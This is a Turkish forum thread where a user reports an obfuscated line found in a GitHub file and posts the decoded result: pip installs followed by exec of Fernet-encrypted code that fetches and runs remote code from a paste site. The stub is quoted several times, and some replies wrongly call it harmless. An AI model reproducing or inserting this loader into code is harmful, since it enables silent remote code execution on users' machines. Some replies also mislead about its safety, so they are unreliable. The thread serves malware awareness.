Neler yeni

Github'da Denk Geldiğim Fudlu Dosya?

C

chauwee

Silver Üye
Katılım
19 May 2024
Mesajlar
68
Beğeniler
0
İletişim
Linkleri görebilmek için kayıt olmanız gerekmektedir


Linkleri görebilmek için kayıt olmanız gerekmektedir
içerisinde import os komutunun normalden uzun oldugnu gördüm baktım base64'le falan şifrelemiş kodu decode ettim bunu verdi

os.system('pip install cryptography');os.system('pip install requests');os.system('pip install fernet');import requests;from fernet import Fernet;exec(Fernet(b'XqnHe1cj1BFPD4PMRgBXO0NCc3ar6ibjUf4d1nUk7Cs=').decrypt(b'gAAAAABmuhtxrvyeW-ky2bEzqGr-UqfCwu8vgeAYgnUmRzvBZPRq-DFlUAKSPbawz12Z-MbdaqLXnKXvBgL3c6fr-G1dxC-fNhKmfWgUB_iZh1faqxCvbwkkpoE0x3nshQv57lo8EvCid-KLcBKRVCnlAA8716rWBxAIyTWSWLpcXsxGJupVQxFaHrTZ5MiIF08qxFd0FNtNeWzlzgO1nFZY5YB-FmLspsiBUQIs482ZQwqeJp5PFuCF4Buc8OeT4t74ZBFCFWYL'))

içerdeki kodu da fernetle şifrelemiş sonra decrypt edip çalıştırıyo, onuda decode ettim bunu verdi

exec(requests.get('
Linkleri görebilmek için kayıt olmanız gerekmektedir
('<pre>','').replace('</pre>',''))

şimdi bu temel olarak zararlı bi yazılım anlamadığım şey requests komutuyla sadece istek gönderemiyo mu bunu neden böyle yapmis bu amk yada ben mi yanlış biliyorum python diline o kadar hakim değilim az cok biseyler biliyorum

Bu arada bu githubdaki dosyayı indirirken win def. geçti onu da ekliyim

konuyu yanlış yere açtıysam kusura bakmayin
 
Ilk attiginda kutuphaneleri import etmis cok sorun yok gibi ama request ile bi paste sitesine goderiyo iceriisnde windows key var ben neden kotu amacli yazlim bulamadim aw
 
chauwee' Alıntı:
Linkleri görebilmek için kayıt olmanız gerekmektedir


Linkleri görebilmek için kayıt olmanız gerekmektedir
içerisinde import os komutunun normalden uzun oldugnu gördüm baktım base64'le falan şifrelemiş kodu decode ettim bunu verdi

os.system('pip install cryptography');os.system('pip install requests');os.system('pip install fernet');import requests;from fernet import Fernet;exec(Fernet(b'XqnHe1cj1BFPD4PMRgBXO0NCc3ar6ibjUf4d1nUk7Cs=').decrypt(b'gAAAAABmuhtxrvyeW-ky2bEzqGr-UqfCwu8vgeAYgnUmRzvBZPRq-DFlUAKSPbawz12Z-MbdaqLXnKXvBgL3c6fr-G1dxC-fNhKmfWgUB_iZh1faqxCvbwkkpoE0x3nshQv57lo8EvCid-KLcBKRVCnlAA8716rWBxAIyTWSWLpcXsxGJupVQxFaHrTZ5MiIF08qxFd0FNtNeWzlzgO1nFZY5YB-FmLspsiBUQIs482ZQwqeJp5PFuCF4Buc8OeT4t74ZBFCFWYL'))

içerdeki kodu da fernetle şifrelemiş sonra decrypt edip çalıştırıyo, onuda decode ettim bunu verdi

exec(requests.get('
Linkleri görebilmek için kayıt olmanız gerekmektedir
('<pre>','').replace('</pre>',''))

şimdi bu temel olarak zararlı bi yazılım anlamadığım şey requests komutuyla sadece istek gönderemiyo mu bunu neden böyle yapmis bu amk yada ben mi yanlış biliyorum python diline o kadar hakim değilim az cok biseyler biliyorum

Bu arada bu githubdaki dosyayı indirirken win def. geçti onu da ekliyim

konuyu yanlış yere açtıysam kusura bakmayin
Genişletmek için tıkla ...
Zararlı bir koda benzemiyor dostum rahat kal
 
Linkleri görebilmek için kayıt olmanız gerekmektedir



cogu github hesaplarinda genelde sag tarafda olur kisacasi ilk attigin da dahil zararli yazilim bulunduruyor yok diyenler tekrar incelerse sevinirim.
 
chauwee' Alıntı:
Linkleri görebilmek için kayıt olmanız gerekmektedir


Linkleri görebilmek için kayıt olmanız gerekmektedir
içerisinde import os komutunun normalden uzun oldugnu gördüm baktım base64'le falan şifrelemiş kodu decode ettim bunu verdi

os.system('pip install cryptography');os.system('pip install requests');os.system('pip install fernet');import requests;from fernet import Fernet;exec(Fernet(b'XqnHe1cj1BFPD4PMRgBXO0NCc3ar6ibjUf4d1nUk7Cs=').decrypt(b'gAAAAABmuhtxrvyeW-ky2bEzqGr-UqfCwu8vgeAYgnUmRzvBZPRq-DFlUAKSPbawz12Z-MbdaqLXnKXvBgL3c6fr-G1dxC-fNhKmfWgUB_iZh1faqxCvbwkkpoE0x3nshQv57lo8EvCid-KLcBKRVCnlAA8716rWBxAIyTWSWLpcXsxGJupVQxFaHrTZ5MiIF08qxFd0FNtNeWzlzgO1nFZY5YB-FmLspsiBUQIs482ZQwqeJp5PFuCF4Buc8OeT4t74ZBFCFWYL'))

içerdeki kodu da fernetle şifrelemiş sonra decrypt edip çalıştırıyo, onuda decode ettim bunu verdi

exec(requests.get('
Linkleri görebilmek için kayıt olmanız gerekmektedir
('<pre>','').replace('</pre>',''))

şimdi bu temel olarak zararlı bi yazılım anlamadığım şey requests komutuyla sadece istek gönderemiyo mu bunu neden böyle yapmis bu amk yada ben mi yanlış biliyorum python diline o kadar hakim değilim az cok biseyler biliyorum

Bu arada bu githubdaki dosyayı indirirken win def. geçti onu da ekliyim

konuyu yanlış yere açtıysam kusura bakmayin
Genişletmek için tıkla ...
Dostum starlara bakarsan düşük ise zaten %90 ihtimalle virus bulunuyordur
 
vance1337' Alıntı:
Linkleri görebilmek için kayıt olmanız gerekmektedir



cogu github hesaplarinda genelde sag tarafda olur kisacasi ilk attigin da dahil zararli yazilim bulunduruyor yok diyenler tekrar incelerse sevinirim.
Genişletmek için tıkla ...
bende o yüzden şüphe etmiştim teşekkürker.
 
github'da virusu bash olarak .vcxproj .sln dosyalarına bile koyuyorlar siz kodun içine bakın diyonuz :D
 
Cevap yazmak için giriş yap yada kayıt ol.

  Şuanda konuyu görüntüleyen kullanıcılar

Toplam: 2 (Kullanıcı: 0, ziyaretçi: 2)

Üst Alt